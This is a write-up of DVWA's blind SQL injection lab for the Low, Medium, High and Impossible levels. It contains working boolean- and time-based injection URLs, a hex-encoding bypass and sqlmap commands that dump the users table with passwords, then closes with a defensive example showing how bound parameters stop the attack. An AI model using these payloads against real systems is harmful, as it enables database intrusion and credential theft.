---level: low---
1. Boolean-based method (use binary search to guess the actual values)
-- table count
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1%27%20and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=2--%20&Submit=Submit#
-- table name length
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1-- &Submit=Submit#
-- table name
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97-- &Submit=Submit#
-- table column count, the table name is users
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and (select count(column_name) from information_schema.columns where table_name='users')=1-- &Submit=Submit#
--table column name
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>97-- &Submit=Submit#
--table data
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select user from users limit 0,1),1,1))=97-- &Submit=Submit#
2. Time-based method
-- confirm the injection point
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and sleep(5)-- &Submit=Submit#
-- length of the current database name
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and if(length(database())=5, sleep(5), 1)-- &Submit=Submit#
-- database name
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and if(ascii(substr(database(),1,1))>97, sleep(5), 1)-- &Submit=Submit#
-- table count
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2, sleep(5), 1)-- &Submit=Submit#
From here on, reuse the SQL conditions from the boolean-based method inside the if() condition to extract the remaining information one piece at a time.
---level: medium---
The Medium-level code uses the mysql_real_escape_string function to escape the special characters \x00, \n, \r, \, ', ", \x1a, and the front-end page uses a drop-down select form in the hope of controlling user input. The executed statement is the same as at Low level.
If the data that would go inside the quoted special characters is already known, it can be passed directly as its hexadecimal value, for example:
1 and (select count(column_name) from information_schema.columns where table_name=0x7573657273)=8 # (0x7573657273 is the hex encoding of users). The page shows "exists", which means the users table has 8 columns.
---level: high---
The difficulty is the same as the High level of the SQL injection (non-blind) exercise, but the High-level code passes the id parameter through a cookie, and when the SQL query returns an empty result it executes the function sleep(seconds) in order to disrupt time-based blind injection. It also adds LIMIT 1 to the SQL query, intending to output only one result. However, because the server itself executes the sleep function, the accuracy of time-based blind injection is affected.
sqlmap:
sqlmap -u "http://192.168.43.140/vulnerabilities/sqli_blind/#" --data "id=1&Submit=Submit#" --cookie="PHPSESSID=hl82sb1n97kl75hun6adsbo6cd; security=low" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump
sqlmap -u "192.168.43.140/vulnerabilities/sqli_blind/cookie-input.php" --second-url "http://192.168.43.140/vulnerabilities/sqli_blind/" --data "id=1&Submit=Submit#" --cookie="id=1; PHPSESSID=bij9f2e5j3bq130k9chgkpkfgc; security=high" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump
---level: impossible---
The Impossible-level code uses PDO, drawing a clear line between code and data, which effectively defends against SQL injection; the addition of the Anti-CSRF token mechanism further improves security.
Reference: https://www.freebuf.com/articles/web/120985.html
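An added example (not DVWA's code, not from the reference above) that shows in one place why the Medium level still leaks a boolean and why the Impossible level's bound parameters do not. It uses an in-memory SQLite table as a constructed stand-in for dvwa.users, a Python re-implementation of mysql_real_escape_string's character set, and a numeric-input check that is an extra layer assumed here rather than something this page describes.

```python
import sqlite3

# Constructed stand-in for the DVWA users table (not the real schema or data).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, last_name TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                 [(1, "admin", "admin", "admin"), (2, "gordonb", "Gordon", "Brown")])


def escape_like_mysql(value: str) -> str:
    """Backslash-escape the same characters as mysql_real_escape_string:
    \\x00, \\n, \\r, \\, ', \" and \\x1a. Nothing else is touched."""
    table = {"\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def lookup_escaped(user_id: str) -> list:
    """Medium-level pattern: the id is escaped but then concatenated into the
    query without quotes. Escaping quotes is irrelevant in an unquoted numeric
    context, so any appended condition is parsed as SQL and its truth value
    shows up as 'row returned' vs 'no row' (a boolean oracle)."""
    sql = f"SELECT user FROM users WHERE user_id = {escape_like_mysql(user_id)}"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(user_id: str) -> list:
    """Impossible-level pattern: the id is bound as a parameter, so the driver
    always treats the whole string as a value, never as SQL text. A numeric
    check in front (assumed here as an extra layer) rejects junk early."""
    if not user_id.isdigit():
        return []
    sql = "SELECT user FROM users WHERE user_id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]
```

Feeding `1 AND 1=1` and `1 AND 1=2` to `lookup_escaped` yields a row and then no row, which is exactly the signal the Low/Medium payloads above depend on; `lookup_param` returns nothing for either, and the bound query would still be safe even without the `isdigit` check because the value never reaches the SQL parser.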